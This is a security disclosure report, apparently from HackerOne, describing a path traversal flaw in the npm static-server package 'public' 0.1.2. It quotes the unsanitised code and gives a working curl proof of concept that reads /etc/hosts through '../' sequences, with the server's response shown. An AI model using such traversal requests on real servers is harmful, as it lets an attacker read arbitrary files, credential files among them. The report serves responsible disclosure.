Hi Guys,
There is Path Traversal in public module.
It allows to read content of arbitrary files on the remote server.
public
Run static file hosting server with specified public dir & port. Support a “direcotry index” like Apache httpd.
https://www.npmjs.com/package/public
version: 0.1.2
Stats
3 downloads in the last day
30 downloads in the last week
384 downloads in the last month
~4600 estimated downloads per year
Lack of file path sanitization causes that any file on the server might be read by malicious user.
Vulnerability exists, because path is used without any check against Path Traversal attacks:
// node_modules/public/bin/public, line 73:
var pathname = url.parse(req.url).pathname;
var filePath = path.join(dir, pathname); // Real file path
var base = filePath.replace(dir, ''); // Base path for browser link
var abs = path.resolve(filePath);
console.log(new Date().toString(), abs);
fs.readFile(filePath, function(err, data) {
if (err) {
(...)
}
res.writeHead(200, { 'Content-Type': mime.lookup(filePath) });
res.end(data);
As you can notice, filePath
is used directly, as read from url.
public
:$ npm install public
public
in direcotry of your choice:me:~/playground/hackerone/Node$ ./node_modules/public/bin/public ./ 8080
Public.js server running with "/home/rafal.janicki/playground/hackerone/Node" on port 8080
curl
command (adjust number of …/ to reflect your system):$ curl -v --path-as-is http://127.0.0.1:8080/../../../../../etc/hosts
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /../../../../../etc/hosts HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< last-modified: Tue, 23 Jan 2018 14:51:52 GMT
< content-length: 188
< content-type: application/octet-stream
< Date: Tue, 06 Feb 2018 15:40:51 GMT
< Connection: keep-alive
<
127.0.0.1 localhost
127.0.1.1 LT0081U2
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
* Connection #0 to host 127.0.0.1 left intact
Please feel free to invite module maintainer to this report. I haven’t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.
I hope my report will help to keep Node.js ecosystem and its users safe in the future.
Regards,
Rafal ‘bl4de’ Janicki
This vulnerability allows to read content of arbitrary files from the server where module is run.